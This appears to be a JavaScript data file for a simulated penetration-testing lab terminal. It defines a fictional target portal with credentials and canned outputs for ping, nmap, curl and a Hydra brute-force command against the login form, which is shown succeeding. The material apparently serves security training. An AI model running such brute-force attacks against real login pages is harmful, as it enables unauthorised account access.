export const TARGET = {
  host: '10.8.0.22',
  hostname: 'portal.nexora.lab',
  url: 'http://10.8.0.22/login',
  user: 'bisha',
  pass: 'bisha',
  client: '10.8.0.10',
  gateway: '10.8.0.1',
  cidr: '10.8.0.0/24',
}

export const COMMANDS = {
  help: [
    'help                 show this help',
    'whoami               current identity',
    'pwd                  working directory',
    'ls                   list files',
    'ip a                 show lab interfaces',
    'ifconfig',
    'ping 10.8.0.22',
    'nmap 10.8.0.22',
    'curl http://10.8.0.22/login',
    'hydra -l bisha -P wordlist.txt 10.8.0.22 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"',
    'cat wordlist.txt',
    'cat flag.txt',
    'clear',
  ],
  whoami: ['bisha'],
  pwd: ['/home/kali'],
  ls: ['Desktop  Documents  Downloads  wordlist.txt  flag.txt'],
  wordlist: ['admin123', 'password', 'letmein', 'qwerty', 'bisha', 'nexora', 'welcome1'],
  ip: [
    '1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536',
    '    inet 127.0.0.1/8 scope host lo',
    '2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500',
    '    inet 172.18.0.12/16 brd 172.18.255.255 scope global eth0',
    '3: tun0: <POINTOPOINT,MULTICAST,UP,LOWER_UP> mtu 1500',
    '    inet 10.8.0.10/24 scope global tun0',
  ],
  ping: [
    'PING 10.8.0.22 (10.8.0.22) 56(84) bytes of data.',
    '64 bytes from 10.8.0.22: icmp_seq=1 ttl=64 time=0.41 ms',
    '64 bytes from 10.8.0.22: icmp_seq=2 ttl=64 time=0.38 ms',
    '64 bytes from 10.8.0.22: icmp_seq=3 ttl=64 time=0.36 ms',
    '--- 10.8.0.22 ping statistics ---',
    '3 packets transmitted, 3 received, 0% packet loss',
  ],
  nmap: [
    'Starting Nmap 7.94SVN at lab-time',
    'Nmap scan report for portal.nexora.lab (10.8.0.22)',
    'Host is up (0.003s latency).',
    'PORT   STATE SERVICE VERSION',
    '22/tcp closed ssh',
    '80/tcp open  http    nginx 1.24.0',
    '| http-title: Nexora Employee Portal',
    '|_Requested resource was /login',
    'Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds',
  ],
  curl: [
    'HTTP/1.1 200 OK',
    'Server: nginx/1.24.0',
    'Content-Type: text/html',
    '',
    '<title>Nexora Employee Portal</title>',
    '<form method="POST" action="/login">',
    '  <input name="username">',
    '  <input name="password" type="password">',
    '</form>',
  ],
  hydra: [
    'Hydra v9.5 starting at lab-time',
    '[DATA] attacking http-post-form://10.8.0.22:80/login:username=^USER^&password=^PASS^:Invalid',
    '[80][http-post-form] host: 10.8.0.22   login: bisha   password: bisha',
    '1 of 1 target successfully completed, 1 valid password found',
    '[STATS] hydra finished',
  ],
}
